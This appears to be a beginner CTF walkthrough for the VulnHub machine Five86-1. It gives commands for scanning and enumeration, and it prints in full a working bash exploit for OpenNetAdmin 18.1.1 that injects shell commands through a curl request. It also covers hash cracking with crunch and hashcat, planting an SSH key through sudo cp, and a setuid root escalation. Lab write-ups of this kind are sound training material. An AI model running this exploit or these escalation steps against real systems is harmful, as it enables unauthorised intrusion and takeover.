Five-86 walkthrough (without metasploit)
Today, i will share my walkthrough for the CTF challenge of vulnhub machine Five86–1. Machine level is beginner to intermediate. We will be solving this without using metasploit.
You can download this box here.
Methodology applied:
Host discovery →to get the machine IP
- netdiscover
- nmap
Enumeration
- gobuster
- nikto
Both the tools used above are for web enumeration.
Exploiting services
- exploiting OpenNetAdmin
- cracking the hashes
Privilege escalation
- Abusing SUID
Walkthrough begins………..We are going to solve this
ithout using Metasploit. (this might give you a feeling of satisfaction.)
Host discovery
The very first step we take while taking down a machine is to know its IP. For this i am going to use netdiscover. As i alotted, host-only network adapter to the machine, so my interface is going to be “vboxnet0”.
┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #netdiscover -i vboxnet0
We could also use nmap as follows:
┌─[root@machine]─[~/mine/five66]
└──╼ #nmap 192.168.56.1/24Now that we know the target IP, we move on to next stage i.e. enumeration.
Enumeration
first run a nmap scan with -sV switch on all ports.
┌─[root@machine]─[~/mine/five66]
└──╼ #nmap -v -sV -p- 192.168.56.15
We see port 80 open, so we hit it on browser and get a blank page. So we went for robots.txt, and we get one directory.
We try this directory on browser, and get this.
NOTE: We could alternatively use nikto for more information.
┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #nikto -h http://192.168.56.15
Lets try /reports directory. We get the following:
NOTE: my machine IP is changed, as i had to reset it for blogging purpose.
Looks like It has a HTTP authentications, of which we don’t have any credentials to login, so we leave it.
Also for directory bruteforce, we could use gobuster.
─[root@machine]─[~/mine/five66]
└──╼ #gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.15
Now we go back to ona (OpenNetAdmin) directory and we search exploit for its version i.e. v18.1.1. We ge the following:
We found an exploit written in bash for the version of OpenNetAdmin we have. When we try to run it, it gives us some errors regarding the line termination. On doing a little google search, i found a simple solution to the problem i.e. “dos2unix”.
┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #dos2unix ona.sh
dos2unix: converting file ona.sh to Unix format...Exploit looks like this:
!/bin/bashURL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Even if we are not well acquainted with bash, or if we have a little programming knowledge, we can tell that its taking the URL as an argument. Which in this case, should be the url to OpenNetAdmin page:
┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #bash ona.sh http://192.168.56.15/ona/
Boom!!! we got a shell.
Privilege Escalation
After getting the shell we realize that we can’t change directory. No matter, wherever we try to go, we stay in the same directory i.e. /opt/ona/www. Then we went on to check other web-related files. And we really get something upon doing so:
Douglas, it could be a potential user, & not only that, they also gave us a hint →”its a 10 character password containing only alphabets aefhrt”.
Fair enough, we use crunch to create a password list for bruteforce using these alphabets only! Saved output in file ansh.
┌─[root@machine]─[~/mine/five66]
└──╼ #crunch 10 10 aefhrt -o ansh
Now we check the hash-type by hash-identifier:
hash -type : [+] MD5(APR)
Cracking the hash
to crack the hash, we use the most desired tool we have, hashcat.
Type of hash : MD5(APR)
┌─[root@machine]─[~/mine/five66]
└──╼ #hashcat -m 1600 -a 0 hashfile ansh -o password
we have password for douglas : fatherrrrr.
Log in to the user.
Switching users(The fun part of this box!!)
we check for SUID, and we find a command /bin/cp which can not be performed as root rather it could be executed as user jen.
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
douglas@five86-1:~$
NOTE: we can ssh into jen if the /home/jen/.ssh/authorized_keys file has our public key.
So we copy our id_rsa.pub in /tmp/authorized_keys. Give it permission 777 so that jen can access it.
douglas@five86-1:~$ cp .ssh/id_rsa.pub /tmp/authorized_keys
douglas@five86-1:~$ chmod 777 /tmp/authorized_keysnow comes the main part. We use SUID to add this file in /home/jen/.ssh/authorized_keys. And then ssh into jen!
douglas@five86-1:~$ sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
Right after we log in jen using ssh, we see that it has a mail. Lets check it .
jen@five86-1:~$ mail
Mail version 8.1.2 01/15/2001. Type ? for help.
"/var/mail/jen": 1 message 1 new
>N 1 roy@five86-1 Wed Jan 01 03:17 28/885 Monday Moss
& t
Message 1:The password for another user, Moss, is in front of us Fire!Fire!
moss@127.0.0.1's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 4 04:09:50 2020 from 127.0.0.1
moss@five86-1:~$
We see a directory, .games, which seems to be a thing of interest. So we go on check it further, and we see a setuid LSB pie executable, running as root.
lets run it!!!!
It appears to be a script which leaves us with the root shell in the end!!
Damn!! That was the thing we wanted from the very beginning.
NOTE: enter command, bash, after “Made in Britain”
Thanks for reading! That’s how we root this box, “without using metasploit”.
Any changes the readers suggest are wholeheartedly welcomed!
